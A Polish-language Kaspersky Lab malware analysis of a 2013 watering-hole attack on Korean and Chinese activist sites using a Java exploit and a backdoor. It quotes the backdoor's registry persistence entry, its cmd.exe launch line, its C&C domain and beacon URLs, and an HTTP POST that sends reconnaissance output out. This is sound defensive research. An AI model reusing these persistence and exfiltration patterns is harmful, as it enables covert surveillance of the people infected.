Stan zagrożeń w internecie znajduje się obecnie na poziomie standardowym. Nie występują duże epidemie a eksperci z Kaspersky Lab nie zanotowali żadnych poważnych incydentów związanych z bezpieczeństwem. Poziom zagrożenia: 1

Zasadzka na rodowitych Koreańczyków

Dmitrij Tarakanow
Kaspersky Lab Expert
Dodany 25 kwietnia 2013, 08:39 CEST
Tagi:

Podczas badań nad propagacją szkodnika PlugX z wykorzystaniem exploitów Javy, natknęliśmy się na skompromitowaną stronę, która hostowała i rozsyłała złośliwy applet Javy, wykorzystujący podatność CVE 2013-0422. Bardzo złośliwa aplikacja została wykryta heurystycznie z ogólnym werdyktem wskazującym na wspomnianą lukę, a witryna hostująca szkodnika nie wyróżniała się niczym spośród ogromu podobnych miejsc, które przechowują różne złośliwe aplikacje Javy, które są wykrywane z podobnym werdyktem. Należy w tym miejscu zaznaczyć, iż nasze poszukiwanie było bardzo osobliwe i wspomniana strona pojawiła się w statystykach bardzo rygorystycznie zawężonych wyników wyszukiwania. OK, szczerze mówiąc był to fałszywy alarm pod względem kryteriów wyszukiwania, ale w tym przypadku był to bardzo pożądany błąd.

Zainfekowana strona była zasobem internetowym o nazwie „minjok.com” i jak się okazało, była to witryna z wiadomościami w języku koreańskim i angielskim, komentująca głównie wydarzenia polityczne na całym Półwyspie Koreańskim. Niezwłocznie poinformowaliśmy redaktora tej strony o naruszeniu zasobu i, choć nie odpowiedział on na naszą wiadomość, strona została po chwili wyłączona. Aby dowiedzieć się czegoś o serwisie „minjok.com” posłużyliśmy się wyjaśnieniami pod adresem http://www.northkoreatech.org/the-north-korean-website-list/minjok-tongshin/.


Opis zasobu „minjok.com”

Redaktorem Minjok-Tongshin jest Amerykanin pochodzenia koreańskiego, domniemany „Ken Kilnam Roh”, który, jak wszystko na to wskazuje, mieszka w Kalifornii. Człowiek ten rzekomo walczy o zjednoczenie obu Korei i chce zobaczyć wszystkich Koreańczyków żyjących w dostatku i szczęściu, czyli żyjących tak, jak według niego powinien żyć jeden naród. Cóż, niestety nie ma prostego rozwiązania, aby zaspokoić roszczenia wszystkich stron i oczywiście wszystkie zaangażowane strony mają oko na to, co dzieje się w tym kierunku. Można sobie wyobrazić, jakie tematy porusza wspomniana witryna z wiadomościami i jakiego rodzaju ludzie są zainteresowani czytaniem takich artykułów – tematy są delikatne, a audytorium składa się z politycznie aktywnych Koreańczyków. Ponadto, witryna ta jest idealnie przystosowana do przeprowadzenia ataku z wykorzystaniem techniki „wodopoju” (ataku watering – hole). Może to zrobić każdy, kto życzy sobie dowiedzieć się, co myślą koreańscy aktywiści lub nawet co planują zrobić, aby poprawić niezbyt czytelną sytuację pomiędzy Koreą Północną i Południową. I właśnie to zostało zrobione przez pewną zainteresowaną tymi tematami grupę.

Infekcja witryny WWW

Witryna została zhakowana, a napastnicy dodali jedną linię do kodu strony wyświetlającej najgorętsze doniesienia z Korei.


Wstrzyknięty złośliwy applet

Ta linia kodu zmuszała przeglądarkę internetową użytkownika odwiedzającego stronę do pobrania i uruchomienia złośliwego appletu Javy, wstrzykniętego w kod strony. W przypadku pomyślnego wykorzystania podatności, szkodliwy plik wykonywalny był pobierany na komputer ofiary i uruchamiany bez wiedzy użytkownika. Plik wykonywalny był również zlokalizowany na zainfekowanej witrynie i zamaskowany jako obraz GIF. Plik wykonywalny jest szkodliwym programem, który pełni rolę prostego droppera i instalatora dla następnego etapu ataku. Najpierw tworzy folder „%systemdrive%:\Temp” i zapisuje w nim plik zwany „agentm.exe”. Tworzy również następującą wartość rejestru:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
bspire = "%systemdrive%:\Temp\agentm.exe BSPIRE"

Aby zagwarantować rozpoczęcie drugiego etapu infekcji, plik „agentm.exe” uruchamia się z każdym uruchomieniem systemu operacyjnego. No i oczywiście, „agentm.exe” jest uruchamiany natychmiast po zainstalowaniu szkodnika przy pomocy następującego polecenia:

cmd.exe /c dir c:\windows & cmd.exe /c for /f %a in ('dir /a /s /b %systemdrive%\temp\agentm.exe') do (%a BSPIRE)


Proces infekcji

Agentm.exe” jest backdoorem, który łączy się z serwerem centrum kontroli (C&C): „mailsgoogle.com”. Serwer C&C aktualnie wskazuje na adres IP: 146.0.79.133 w Holandii, ale jest to dedykowany serwer, oferowany do wynajęcia przez rosyjską firmę telekomunikacyjną Hostkey. Domena C&C: „mailsgoogle.com” została zarejestrowana w grudniu 2012 r. z użyciem adresu e-mail: richard.blosser@aol.com.


Dane rejestracyjne „mailsgoogle.com

Aby pracować zgodnie z założeniami swoich twórców, backdoor musiał zostać uruchomiony z parametrem „BSPIRE”. Jeśli program zostanie wykonany bez prawidłowego argumentu, typuje następujące nazwy procesów i poszukuje ich pomiędzy uruchomionymi procesami:

XxXlorer.exe - w przypadku braku argumentów;
explXXer.eXe - jeżeli argumet istnieje, ale różni się od „BSPIRE”;

Jeżeli argumentem jest „BSPIRE”, generowana jest nazwa procesu „explorer.exe”, do którego wstrzykuje się szkodnik. Pewnym znakiem szczególnym tego złośliwego oprogramowania jest to, że tworzy ono ciągi tekstowe (bajt po bajcie) w całym swoim zakresie:


Budowa ciągów przy użyciu znaków

Nie jest to bardzo rzadka technika, ale to złośliwe oprogramowanie wykorzystuje ją bardzo prawidłowo, aczkolwiek dość nadmiernie – oczywiście w celu zaciemniania szkodliwego kodu.

Kiedy proces „explorer.exe” zostanie znaleziony w pamięci, agent wstrzykuje się częściowo do tego procesu i zdalnie uruchamia wątek swojego kodu w kontekście procesu „explorer.exe”. Wątek ten wykonuje wszystkie główne zadania złośliwego oprogramowania. Pomimo faktu, że złośliwy program ma zostać wykonany tylko raz – gdy system operacyjny zostaje uruchomiony – po wstrzyknięciu kodu w proces „explorer.exe” szkodnik dodatkowo tworzy mutex po nazwie WIN32_BLACKSPIRE_02, aby uniknąć uruchomienia wielu swoich instancji w tym samym czasie. Backdoor łączy się z serwerem C&C przy pomocy żądań HTTP GET:

mailsgoogle.com/bbs/board.php?bincode=<base64 encoded="" string=""></base64>

Zakodowany ciąg zawiera datę i czas uruchomienia początkowego agenta, dla przykładu: [2013-04-15 13h00m00s334]. Te dane, wraz z adresem URL do połączenia z serwerem C&C, są przechowywane w pliku „%systemdrive%\Temp\passing.dat”, który jest zapisywany przez początkowego agenta. Plik ten jest następnie odczytywany przez kod wstrzykiwany do procesu „explorer.exe”, tym samym umożliwiając twórcy szkodnika wdrożenie metody przesyłania danych pomiędzy różnymi składnikami swojego „produktu”.

Backdoor jest bardzo prosty. Zdolny jest do wykonania zaledwie dwóch działań, określanych przez rozkazy z serwera C&C – może pobierać do uruchomienia biblioteki DLL i odinstalować samego siebie. Kiedy biblioteka DLL jest wysyłana przez serwer C&C, backdoor odbiera ją i zapisuje pod nazwą „winnt32x.dll” w tymczasowym folderze systemowym, a następnie ładuje ją za pomocą funkcji LoadLibraryA i wywołuje funkcję eksportu biblioteki run. Kiedy funkcja run zakończy działanie, biblioteka jest wyładowywana z pamięci, a plik „winnt32x.dll” jest usuwany.

Centrum kontroli nie wysyła dodatkowych bibliotek do zainfekowanej maszyny od razu; napastnicy przesyłają je, kiedy zbadają, jaki komputer został przejęty. To odzwierciedla ukierunkowany charakter ataku. W trakcie naszego badania zaobserwowaliśmy, że napastnicy po chwili rekonesansu przesłali dwa rodzaje bibliotek. Kilka bibliotek pierwszego typu było tylko wrapperami dla rozkazu dir na zainfekowanym komputerze, z różnymi ścieżkami dostępu, ukazującymi lokalizacje zawartości zakodowanej w strukturach bibliotek DLL. Drugi typ był wykonawcą innego rozkazu wiersza poleceń: systeminfo. Biblioteki te kierowały rezultaty wykonanych poleceń bezpośrednio do utworzonego pliku, zawierającego w nazwie datę i czas wykonania rozkazu, na przykład: [2013-04-16 11H01M19S000]_TYPE02. Pliki były zapisywane w tymczasowym folderze systemowym. Następnie zawartość utworzonego pliku była odczytywana i przesyłana na serwer C&C w formie zaszyfrowanej z użyciem algorytmu BASE64. Poniżej znajduje się przykład takiej wysyłki:

POST /bbs/board.php?bincode=WzIwMTMtMDQtMTUgMTRoMDVtMzZzNTcxXQ==&opcode=true&rscode=WzIwMTMtMDQtMTYgMDRoMDRtMDRzNjA5XV90eXBlMDI= HTTP/1.1
Content-Type: multipart/form-data, boundary=mm1777multi3333headr
Host: mailsgoogle.com
Content-Length: 838
Connection: Keep-Alive

--mm1777multi3333headr
Content-Disposition: form-data; name="file"; filename=WzIwMTMtMDQtMTYgMDRoMDRtMDRzNjA5XV90eXBlMDI=

//4gAFYAb [snip] AA0ACgA=
--mm1777multi3333headr—

W sumie napastnicy załadowali 4 biblioteki zdolne do wykonania następujących poleceń:

cmd /c dir %appdata%
cmd /c dir c:\
cmd /c dir d:\
cmd /c systeminfo

Po zorientowaniu się, że infekowany system operacyjny nie wydaje się należeć do jakiejś ważnej osobistości (tak naprawdę była to testowa maszyna wirtualna posiadająca minimalne zasoby), napastnicy stracili zainteresowanie naszym komputerem i przestali dawać znać o sobie. Co ciekawe, ten sam exploit z identycznym ładunkiem wykonywalnym został wykryty na witrynie „forum.beijingshots.com”. Szkodnik rezyduje w części forum, która proklamuje się być platformą do swobodnych rozmów; jest również zaszyty w części dedykowanej obronie praw człowieka. Ogólnie, „forum.beijingshots.com” to miejsce w sieci, gdzie dyskutuje się o różnych aspektach, również politycznych, dotyczących napiętej sytuacji w Chinach. Kategorycznie odradzamy odwiedzanie tego zasobu, ponieważ wciąż jest on zainfekowany!

Według naszych statystyk, niewielka liczba użytkowników padła ofiarą opisywanych zasobów ze szkodliwą zawartością. Większość ofiar pochodzi ze Stanów Zjednoczonych, Peru, Tajlandii i Niemiec. Biorąc pod uwagę, w jaki sposób działali napastnicy, jesteśmy pewni, że są to utajone ataki z użyciem techniki „wodopoju”, ukierunkowane na działaczy chińskich i koreańskich. W tej chwili nie mamy wystarczająco dużo danych, aby dokładnie określić, kto stoi za tymi atakami, ale jest to prawdopodobnie tylko część większej, szeroko zakrojonej kampanii.

Tak więc, kimkolwiek są napastnicy i jaki jest zakres samych ataków, wszyscy użytkownicy, którzy regularnie odwiedzają serwisy informacyjne, w których komentowane są bieżące wydarzenia polityczne w Korei (jak i również chińscy aktywiści) powinni mieć się na baczności – stali się przedmiotem zainteresowania złośliwych łowców, a polowanie toczy się z wykorzystaniem naprawdę paskudnych narzędzi.

Produkty Kaspersky Lab wykrywają i neutralizują opisywane szkodliwe oprogramowanie:
Applet Javy: javaupdates.jar (MD5: 0x9d8e935ef2c509ea30df1bd88127cc34) - Exploit.Java.CVE-2013-0422.z
Dropper: images.gif (MD5: 0xcd2690c325e9ca17cd99ba6b76a9fa25) - Backdoor.Win32.Agent.dboe
Agent: agentm.exe (MD5: 0xaaf79582e81e4fdc340865650d9c74a6) - Backdoor.Win32.Agent.dboe